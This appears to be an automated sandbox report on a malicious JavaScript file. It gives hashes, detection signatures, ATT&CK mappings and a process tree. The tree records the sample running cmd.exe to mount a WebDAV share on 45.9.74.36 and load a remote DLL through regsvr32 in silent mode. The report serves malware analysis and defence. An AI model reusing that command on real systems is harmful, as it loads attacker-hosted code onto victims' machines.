35463244378e9b1295251a25727fae9ed65188adcc28a6587d494c069fe2f044

Analysis

max time kernel
140s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20240709-en
resource tags

arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
submitted
23/07/2024, 07:49

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

77031955526688281.js
Size

5KB
MD5

517119e5c91cf963ca435486578e85b1
SHA1

3614fa7b8ceb9957bf780289a157b6b3bd2080e5
SHA256

35463244378e9b1295251a25727fae9ed65188adcc28a6587d494c069fe2f044
SHA512

cca0098a1443d35f4fee4b01827c7802f7a1fc0853b935da58d078176c425cc6130f8724627433045b254f38e52ab12d0048a272b44329902214bb387aa374ea
SSDEEP

48:T08lL8wZuyVb1AvDGH9aHTz17dHfIBbxnyNi5QQeyhCOH0oAsKrZeRzp9LRCpiYI:aN4az8WZYmigtTqFvAkmCzqFvS

Score

7^/10

execution

Malware Config

Signatures

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Control Panel\International\Geo\Nation	wscript.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Runs net.exe

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 4484 wrote to memory of 5068	4484	wscript.exe	84
PID 4484 wrote to memory of 5068	4484	wscript.exe	84
PID 5068 wrote to memory of 4992	5068	cmd.exe	86
PID 5068 wrote to memory of 4992	5068	cmd.exe	86

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\77031955526688281.js
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4484
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k net use \\45.9.74.36@8888\davwwwroot\ && regsvr32 /s \\45.9.74.36@8888\davwwwroot\14299284221.dll
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5068
- - C:\Windows\system32\net.exe
    net use \\45.9.74.36@8888\davwwwroot\
    3⤵
    PID:4992

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads